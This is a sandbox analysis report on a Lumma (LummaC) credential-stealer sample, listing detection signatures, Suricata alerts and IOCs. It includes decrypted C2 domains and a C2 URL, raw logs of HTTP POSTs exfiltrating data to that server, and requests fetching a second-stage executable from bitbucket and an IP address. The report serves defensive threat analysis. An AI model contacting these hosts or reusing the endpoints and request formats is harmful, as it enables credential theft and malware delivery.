
Windows Analysis Report
tTGxYWtjG5.exe

Overview

General Information

Sample name: tTGxYWtjG5.exe (renamed because the original name is a hash value)
Original sample name: 6e0e190ce94e8017d60243ed97725433.exe
Analysis ID: 1580288
MD5: 6e0e190ce94e8017d60243ed97725433
SHA1: d849deb5f2b530ae73dbff0425c3c1580023b284
SHA256: 2e664bc54aa4050db04b9c39dbd3acdbeda05049ecf4a4642ba6bd3cb28aaef3
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • tTGxYWtjG5.exe (PID: 424 cmdline: "C:\Users\user\Desktop\tTGxYWtjG5.exe" MD5: 6E0E190CE94E8017D60243ED97725433)
    • WerFault.exe (PID: 7788 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 1840 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Extracted malware configuration (LummaC): {"C2 url": "https://observerfry.lat/api", "Build Version": "LOGS11--LiveTraffi"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author
00000001.00000003.1474101580.000000000087D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security
00000001.00000003.1436505307.0000000000864000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000001.00000003.1436316095.000000000081E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000001.00000003.1436238542.0000000000859000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000001.00000003.1473906680.000000000087D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T08:50:36.751774+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49700 | 172.67.199.72 | 443 | TCP
2024-12-24T08:50:39.107570+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49701 | 172.67.199.72 | 443 | TCP
2024-12-24T08:50:41.644366+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49703 | 172.67.199.72 | 443 | TCP
2024-12-24T08:50:44.014207+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49709 | 172.67.199.72 | 443 | TCP
2024-12-24T08:50:46.387851+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49715 | 172.67.199.72 | 443 | TCP
2024-12-24T08:50:49.316664+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49721 | 172.67.199.72 | 443 | TCP
2024-12-24T08:50:53.077105+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49735 | 172.67.199.72 | 443 | TCP
2024-12-24T08:50:57.960121+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49746 | 172.67.199.72 | 443 | TCP
2024-12-24T08:51:00.502738+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49752 | 185.166.143.48 | 443 | TCP
2024-12-24T08:51:03.017871+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49758 | 16.15.177.52 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T08:50:37.858563+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49700 | 172.67.199.72 | 443 | TCP
2024-12-24T08:50:39.879144+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49701 | 172.67.199.72 | 443 | TCP
2024-12-24T08:50:58.745276+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49746 | 172.67.199.72 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T08:50:37.858563+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49700 | 172.67.199.72 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T08:50:39.879144+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.7 | 49701 | 172.67.199.72 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T08:50:42.654775+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49703 | 172.67.199.72 | 443 | TCP

AV Detection

Source: tTGxYWtjG5.exe | Avira: detected
Source: 00000001.00000002.1910955173.0000000000866000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": "https://observerfry.lat/api", "Build Version": "LOGS11--LiveTraffi"}
Source: tTGxYWtjG5.exe | ReversingLabs: Detection: 68%
Source: tTGxYWtjG5.exe | Virustotal: Detection: 51%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: tTGxYWtjG5.exe | Joe Sandbox ML: detected
Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: bashfulacid.lat
Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: tentabatte.lat
Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: curverpluch.lat
Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: talkynicer.lat
Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: shapestickyr.lat
Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: manyrestro.lat
Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: slipperyloo.lat
Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: wordyfindy.lat
Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: observerfry.lat
Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000001.00000003.1307739179.00000000049D0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: LOGS11--LiveTraffic
Source: tTGxYWtjG5.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49746 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.7:49752 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 16.15.177.52:443 -> 192.168.2.7:49758 version: TLS 1.2

Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49700 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49703 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49701 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49701 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49746 -> 172.67.199.72:443
Source: Malware configuration extractor | URLs: https://observerfry.lat/api
Source: Joe Sandbox View | IP Address: 172.67.199.72
Source: Joe Sandbox View | IP Address: 185.166.143.48
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49715 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49721 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49746 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49752 -> 185.166.143.48:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49758 -> 16.15.177.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49735 -> 172.67.199.72:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 53
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=XGZGWN69Z4L
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12808
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=6AMRFSH27T1LETNRW
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15076
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=H7PJEKSB2A4NV42C9
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20401
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=L01YY37EQMF
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1218
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=WX12WBHD86IUKHKE1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 585769
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 88
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: bitbucket.org
Source: global traffic | HTTP traffic detected:
    GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNAATU3DWE&Signature=CB%2FhJqRRscnPJ9O8Lh%2F9UJjvRsI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECAaCXVzLWVhc3QtMSJIMEYCIQCmp4sJiJ2Vg6lV0IveQh7F4q5yllY1RSaQ%2FRcDZG8jLAIhAPOa65Thr25Wh%2Bug0HyKJXl55OoT1s0rFYCYSSkigJNCKrACCOn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgwDuXuwpnkzPvUt7VoqhAIz%2BmwV7tES1WBaFS7IYWek7EXNAzdsYmQgkGyYrYxyA33m%2FJutt9lbP2U%2BMaAYuta1agrCmRKMj5pCeNx%2F%2FwHViPQ9O1Ned5SZGGKGYUIs5Bq6ktSFT%2BMOQ4n4hJi21TpAZk%2BO8TxTIusr5XqnH9VIGNA8dgL7jsf5ft4ir%2FWp2Hc2tIKVTm4EwHvhE8TCDJFhxF9IMnhSEQM1Wo1iIEeHRPK1a6jc18zDcHrHLu3Rf%2FTmzTrnBPx%2FWf4S5A%2F7CtkqMo29ARzMDm3VVSop46xM1Dz7%2FrkryEckuEuDtCT2F7eMPTxyXoW9PbRARoYCpJjbZ4p3lahtqL2qhmtVntLRTt6RNTCPz6m7BjqcAfpKPZ%2Bk48Y1M5IVUnLseVOnLKBZZZTFh9obbou77yeNXL9JcUQ1nOrkQPFNF%2BuaOyO%2FvQpad0BaYzg34uvur9Ge%2FjUPRr9wdY2fX83lmXUzA%2FYVdbRhgq47ryEnk02AY3mG17E8eX%2BqlW8mJlyvN80mj685f8rU0%2FU5eS3JeqKGbqyOm05scABsj1qVc5EsH31I3YZQ1CBRxp1CkA%3D%3D&Expires=1735028375 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: bbuseruploads.s3.amazonaws.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: observerfry.lat
Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
Source: global traffic | DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: observerfry.lat
Source: tTGxYWtjG5.exe, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.000000000085E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/off/def.exe
Source: tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.000000000085E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/off/def.exeN/-
Source: tTGxYWtjG5.exe, 00000001.00000002.1915451922.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619233681.00000000054AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: tTGxYWtjG5.exe, 00000001.00000002.1915451922.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619233681.00000000054AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: tTGxYWtjG5.exe, 00000001.00000002.1915451922.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619233681.00000000054AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: tTGxYWtjG5.exe, 00000001.00000002.1915451922.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619233681.00000000054AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: tTGxYWtjG5.exe, 00000001.00000002.1915451922.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619233681.00000000054AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: tTGxYWtjG5.exe, 00000001.00000002.1916296960.0000000005B99000.00000002.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: tTGxYWtjG5.exe, 00000001.00000002.1915451922.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619233681.00000000054AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
Source: tTGxYWtjG5.exe, 00000001.00000002.1915451922.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619233681.00000000054AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
Source: tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: tTGxYWtjG5.exe, 00000001.00000002.1915451922.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619233681.00000000054AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: tTGxYWtjG5.exe, 00000001.00000002.1915451922.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619233681.00000000054AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: Amcache.hve.11.dr | String found in binary or memory: http://upx.sf.net
Source: tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: tTGxYWtjG5.exe, 00000001.00000003.1407016337.00000000054D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: tTGxYWtjG5.exe | String found in binary or memory: https://aui-cdn.atlassia
Source: tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000888000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619213944.000000000088D000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://aui-cdn.atlassian.com/
Source: tTGxYWtjG5.exe | String found in binary or memory: https://bbc-frontbucket-canary.pro
Source: tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1
